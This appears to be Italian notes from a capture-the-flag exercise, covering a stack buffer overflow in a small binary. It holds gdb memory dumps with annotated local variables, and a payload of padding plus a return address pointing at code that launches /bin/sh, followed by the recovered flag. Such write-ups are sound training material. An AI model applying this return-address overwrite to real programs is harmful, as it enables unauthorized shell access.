Quanti anni hai?
7
Come ti chiami?
"a" * 34

$ x/72xb $rbp-0x38
0x7fffffffd638: 0x8e    0x12    0x40    0x00    0x00    0x00    0x00    0x00
0x7fffffffd640: 0x67    0x61    0x61    0x61    0x61    0x61    0x61    0x61  <- RSP
0x7fffffffd648: 0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffd650: 0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffd658: 0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffd660: 0x61    0x61    0x61    0x00    0x07    0x00    0x00    0x00
0x7fffffffd668: 0x00    0xd7    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffd670: 0x01    0x00    0x00    0x00    0x00    0x00    0x00    0x00  <- RBP
0x7fffffffd678: 0xa8    0x2c    0xdd    0xf7    0xff    0x7f    0x00    0x00 


0x67 => valore random di iVar1
----------------------------------------------
0x61 * 34, 0x00 => valori di auStack_37[35]
----------------------------------------------
0x07    0x00    0x00    0x00    => local_14[0]
0x00    0xd7    0xff    0xff    => local_14[1]
0xff    0x7f    0x00    0x00    => local_14[2]


Se si fa break sull'if e si stampa il registro usato per il confronto:
$ print /x $al
al = 0x67

Dopo lo stack si trova questo indirizzo 0x7ffff7dd2ca8,
potrebbe essere un indirizzo di ritorno.

Buffer overflow fino a fine stack e con scrittura dell'indirizzo 0x00000000004012ce <+197>:   lea    RAX,[s_/bin/sh_00402055]

Come ti chiami?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xce\x12\x40\x00\x00\x00\x00\x00

flag{r3t2wh3r31w4nt}